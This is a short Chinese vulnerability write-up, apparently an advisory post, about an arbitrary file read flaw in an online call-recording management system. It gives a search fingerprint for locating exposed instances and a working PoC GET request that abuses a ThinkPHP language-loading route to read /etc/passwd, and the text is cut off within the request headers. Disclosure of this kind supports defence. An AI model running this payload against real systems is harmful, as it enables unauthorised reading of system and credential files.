录音管理系统接口index存在任意文件读取漏洞(DVB-2025-9007)

免责声明

仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权，请及时与我们联系，我们将尽快处理并删除相关内容。

0x01 漏洞描述

录音管理系统index存在任意文件读取漏洞，攻击者可以通过此漏洞读取任意系统文件，通过可以用来配合图片木马，控制整个网站服务器权限，从而威胁系统数据安全并可能获取服务器控制权限。该漏洞源于系统未对用户输入的文件路径进行严格校验，建议及时修补以避免潜在安全风险。

0x02 复现环境

title="在线录音管理系统"

0x03 漏洞复现

Poc如下

GET /callcenter/public/index.php?s=index/\think\Lang/load&file=/etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) Ap